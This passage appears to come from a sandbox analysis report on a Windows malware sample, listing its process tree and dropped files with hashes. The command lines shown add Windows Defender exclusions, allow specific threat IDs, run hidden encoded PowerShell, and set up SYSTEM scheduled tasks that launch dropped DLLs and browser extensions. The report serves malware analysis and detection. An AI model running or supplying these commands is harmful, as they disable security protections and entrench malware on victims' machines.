C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:324⤵PID:900
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:644⤵PID:1052
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:324⤵PID:872
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:644⤵PID:1700
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:324⤵PID:2452
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:644⤵PID:1600
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:324⤵PID:564
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:644⤵PID:3016
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:324⤵PID:1792
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:644⤵PID:2848
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pICeQFkDCDDquYVB" /t REG_DWORD /d 0 /reg:324⤵PID:1672
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pICeQFkDCDDquYVB" /t REG_DWORD /d 0 /reg:644⤵PID:1520
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2192
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2504
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf" /t REG_DWORD /d 0 /reg:324⤵PID:2808
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf" /t REG_DWORD /d 0 /reg:644⤵PID:2964
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:324⤵PID:2992
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:644⤵PID:2732
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gasWPEiSm" /SC once /ST 14:56:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:3008 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gasWPEiSm"3⤵PID:2888
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gasWPEiSm"3⤵PID:1244
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1172
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1692
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2944
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2960
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 08:41:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\PnoMheo.exe\" aV /cfqzdidqr 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2260 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yfARWRprRqUFWeTGf"3⤵PID:2024
-
C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\PnoMheo.exeC:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\PnoMheo.exe aV /cfqzdidqr 385118 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1408 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:952
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:2916
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2980
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2436
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:112
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:584
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:1788
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2896
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2924
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:836
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:1264
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:568
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:984
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:2044
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:1448
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1424 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:428
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "biPxHmULFllsbMgnpt"3⤵PID:1676
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:1436
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:1524
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:1708
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2200 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2072 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:976
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:1636
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1508 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1560 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zgoZGMcaU\nkfBLx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHJXtPPPvDXVqpH" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1852 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JHJXtPPPvDXVqpH2" /F /xml "C:\Program Files (x86)\zgoZGMcaU\QRxtNkk.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2448 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JHJXtPPPvDXVqpH"3⤵PID:2896
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JHJXtPPPvDXVqpH"3⤵PID:1264
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HtmGfIeJlxktuW" /F /xml "C:\Program Files (x86)\epoBtGYzqLvU2\rKINsXm.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:844 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "beuYBzgGTLbmn2" /F /xml "C:\ProgramData\pICeQFkDCDDquYVB\DVqKWAY.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:612 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ykYfCTTujiceFdOqI2" /F /xml "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\brmtqfz.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2076 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fWcEirOkMoMQjrUKaey2" /F /xml "C:\Program Files (x86)\ecOJmsgAHWlsC\UYwsIhp.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:980 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aNyMQclguOCSCcjxm" /SC once /ST 07:11:00 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nlcUipsDcFbdntMB\UktmGADr\xagWSiq.dll\",#1 /dYLdidc 385118" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1724 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "aNyMQclguOCSCcjxm"3⤵PID:1852
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yfARWRprRqUFWeTGf"3⤵PID:2680
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\UktmGADr\xagWSiq.dll",#1 /dYLdidc 3851182⤵PID:1860
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\UktmGADr\xagWSiq.dll",#1 /dYLdidc 3851183⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1624 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "aNyMQclguOCSCcjxm"4⤵PID:1996
-
C:\Windows\system32\taskeng.exetaskeng.exe {95E169DE-EFA7-4B19-BBCA-3049AC724D66} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]1⤵PID:856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2252
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1740 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2992
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1036 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2544
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1276
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1652
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1456
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\brmtqfz.xmlFilesize
2KB
MD594b733c7e40b4b77ff041a3cb59c08c0
SHA1237447afb3dc0a10625383bc86f7406eccb896ca
SHA256437a4120e12689d755f0a0b60eda2ef7922bb03c06dfe764a68735e1682d169c
SHA5129c20770cd784c1420122c9749cb466da721606c3b099e9263d7e4c30251ca808db2f93851272424775e31d20cc8a6d8c017e1a563b17e3bf1199e8a75970905a
-
C:\Program Files (x86)\ecOJmsgAHWlsC\UYwsIhp.xmlFilesize
2KB
MD5028201130334de880a3b6d55fd04f3ee
SHA145cd8c59254917af5048eb64d4b84b53f3f73b75
SHA256f5d41cdf4c0ac8dc4495a25d67e6777b067d5974fe452230dbdc36e34ba7922d
SHA512f605fc61039218f16b9aa99a64b9c47b4766721350d69ec7ad7c0fd51c90e46c5c8c5624d4957aa871788c39639c79c8031ae9d2024579a48b2e4b0f28912e01
-
C:\Program Files (x86)\epoBtGYzqLvU2\rKINsXm.xmlFilesize
2KB
MD50df54e95ca0748c91052bdd9bdb9b827
SHA17a42ea76542246ab0deee309a75a807903558ebd
SHA256a4bc92d3cccf9b59f35ac8a3859cf73db85a2faa2bf5119f63420e25e811c0bb
SHA512f29bb760519fc1873d5501d44077fa736617c733c41432a602cffc6827bec6c641bacee023a1143c9a7ac5dfbeadfffc83f6ec4f979852a4c3f39ed8f6077b54
-
C:\Program Files (x86)\zgoZGMcaU\QRxtNkk.xmlFilesize
2KB
MD5a990773ccb43defde5177b376d53cbf8
SHA1e3eca146c7e6def563d30a2fa2c858ea2f8122e1
SHA2564666b2d014d6bb336b9f1d60f13f1198e7ca8c9b0921e3ab239f1021209c2d79
SHA5120e79c672dfd3d67bdce05a711adc022e15989707a221fe3ed4f3e2d3e89fe3579fbefdf406898e845f00e6d58e68894414cb090e92f2f0511beec481da6da7a3
-
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpiFilesize
2.0MB
MD5f652aec1c43f9b8171283ab11f88954e
SHA1d8d7e45bfac5a25e0bd3835bf259a4234cdfd5c6
SHA256a7fe6209aab59e90ba9fe9d109e46aac63708e298ebd7323ff5a59ad767fbe85
SHA51282672f4c269a6a782ac8ad86dbc1d8a0e3e760f9ae3906a42b9ab242f3fd9173faae32a9fac2368621bee5e691fdc651d6eb76d39b1409cac0c8d19be9b47d56
-
C:\ProgramData\pICeQFkDCDDquYVB\DVqKWAY.xmlFilesize
2KB
MD5656ace3cb7299e0fe333666812e81fc9
SHA1404423f9f115b800cb92f21d5ac20aad4818a18b
SHA256f332493bce6a24fe5faa0a284c682ceaaa1ebddece3577ea7bf148509c284d73
SHA5127bdcc545f8de85f03749e6715b0a161a532089a5fccc4d3c478bf188b40c9a195634a1fc7a475d0081a97fe22dc1769d3c85f88947098ce31a4c46922a3abb72
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
10KB
MD5b23f67f23af60e42f24b25046f1f4cbc
SHA1e98cc18c6521d6f433ff9098fc4d798f139f7d43
SHA2568749f6b22babe72bbe8d1cca4370096600413d57aeca11b8013f146b08464434
SHA512659e41e84902ae8111a358da9adaeb278f25d4d129603338bc3a56128a7093894b8782c3a10389ef33e57a6dcbd6bf605a6a47ec8a8fda1e74a8ea73705327c6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5fe724a3c8adc303f5f9a66e18d9de00e
SHA18ee711a967c389888fd2b64d1b67fe6d9268e335
SHA2562e677600d8f49359b9e08015e9d9690f53510de970ae375b9f15840886a4fdd3
SHA512d558737ca942b17665cc3a6ca2bbb1f4254767dbc7217f37a1224b77f04bb78dd379317733fdd964551291d0e4532e9998736dd128d15a29defa702501273fe9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD592dc00edd817bffde211ef19148e2aa0
SHA1b5793f3d461c6c2caef3bda534cd6892f6d2374c
SHA256739c92c5874eaa5541d28fa304801776c7fa51a6cb8fb09b03e59074a152ba99
SHA5120ad75ed268ca7e18ec0a550729ff59745372175fa8eef7f3e3a9a0182160394b464d6f022552958ae9f443e2f38241f56fe6f642f8af30e0798317f082b0227c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD5f215d93f906e796c06805b2fcd74db90
SHA11a89741bbe447317c76699d15cd7c9dc646cef9b
SHA2561d9c030440f602aa5f63612cf0f60aafbb541008aea74e51180e2269cdd0dc8a
SHA5126d2140b285a10032c2e19ac94cc5ebbda0b3e53cdef07489c2ce9f053a361ca3da056180d63fd89932be064e31303aea7bf57033b142d62ec5a7a3f418d54d09
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0rowjuc9.default-release\prefs.jsFilesize
6KB
MD5aad33f82dadc3c4f7c69db76dd7d7308
SHA1ad143d33384b8cc826656eedd4739a3112d746bd
SHA256c969e1538711c1c5609e050d26abb6a8999083d8ff3bd4b7f3cec86cfaf5c3e0
SHA5121a0657cd06d8a42256e717afda6dde456ad1581082c820f04b8b0e945f544a6c10425ff7ad5bddd9089d2de9eb25517e47eaa4b4673b7ed7fd2a23ac09714d6b
-
C:\Windows\Temp\nlcUipsDcFbdntMB\UktmGADr\xagWSiq.dllFilesize
6.3MB
MD58c09cbdfca659145605da7a41f92dce9
SHA1e38cd0e16b60e08b97802ea520e4c8644cb2ab8a
SHA2566313107181a464de3dd634b682e308a1bc7ea77fe2155ce747a37d7bdfdbcb6b
SHA512de5205291e9fac1f1b3e712043480c2981ffd93f3bf45f4006ae05a6c44a93bb56edd68d611d6bbc9f22e8ad517ed4aada79f70876adecb35c3c555f6b5796fd
-
C:\Windows\Temp\nlcUipsDcFbdntMB\tOKaOeOd\udXmpsNXrpxEuFTL.wsfFilesize
9KB
MD5a0fb1c6e87f65635bfdd67b14f1639a2
SHA18358d4bd3eb25de253a2ab165a52b02c923440dc
SHA256cdf7a0390f08c85afd59fa9d615b983817c5705f4b59376f10f8800bac004c4e
SHA5122e8d0e74118870252bacc20ca4c3cb15aae1a11388613518e8b6009bc03fb57199bf4cac717fe65f7bc1496eaa7c51284b04a921b62cd7ae16c9b8770464f749
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
6KB
MD5ea1b0d554cd2c4af555881bd74c6a38d
SHA1abbbc81532efcc007c8ca3bd18676e27f10768cc
SHA256721693f5823f8c1e5894c0afc2553954b5a57850e32c0cc40536eed6fabaf3c6
SHA5129fd348355fe9d2404ec5de16f748d8a98800364af4625b857671fdda5dd8fea832af5c40a0578a9d6502beba926efaaf71904ae7e78b6f3ba29b318dc97fc61b
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
